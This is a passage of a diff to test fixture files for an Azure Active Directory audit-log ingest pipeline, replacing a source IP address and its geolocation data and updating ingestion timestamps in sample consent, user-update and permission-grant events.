"Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6983,7 +6353,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -7122,7 +6492,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -7134,12 +6504,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036305500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\
",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id:
 MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125029500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, 
ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -7302,7 +6672,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:38.036311500Z", + "ingested": "2021-12-09T13:41:51.125033900Z", "original": "{\"Actor\":[{\"ID\":\"fim_password_service@support.onmicrosoft.com\",\"Type\":5},{\"ID\":\"100300008060F582\",\"Type\":3},{\"ID\":\"User_00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\",\"ActorIpAddress\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"\",\"CreationTime\":\"2020-02-10T15:15:04\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\"},{\"Name\":\"actorObjectId\",\"Value\":\"00000000-0000-0000-0000-000000000000\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"fim_password_service@support.onmicrosoft.com\"},{\"Name\":\"actorPUID\",\"Value\":\"100300008060F582\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"StrongAuthenticationPhoneAppDetail\\\",\\\"TargetId.UserType\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"4aa56c6c-8fa5-4787-a165-03f181541438\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEve
nt\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:15:04.2043419Z\"},{\"Name\":\"env_epoch\",\"Value\":\"4QPHR\"},{\"Name\":\"env_seqNum\",\"Value\":\"87075075\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"becwebservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"becwebservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RBWSR554\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"83c924c1-f2e2-4b39-8eda-b80c3823a875\",\"ModifiedProperties\":[{\"Name\":\"StrongAuthenticationPhoneAppDetail\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": -1,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n 
\\\"OathTokenTimeDrift\\\": 0,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"StrongAuthenticationPhoneAppDetail\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Update user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"fim_password_service@support.onmicrosoft.com\",\"UserKey\":\"100300008060F582@support.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7335,25 +6705,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" 
@@ -7367,7 +6719,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7503,7 +6855,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -7515,12 +6867,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036317200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\
"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-
661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", 
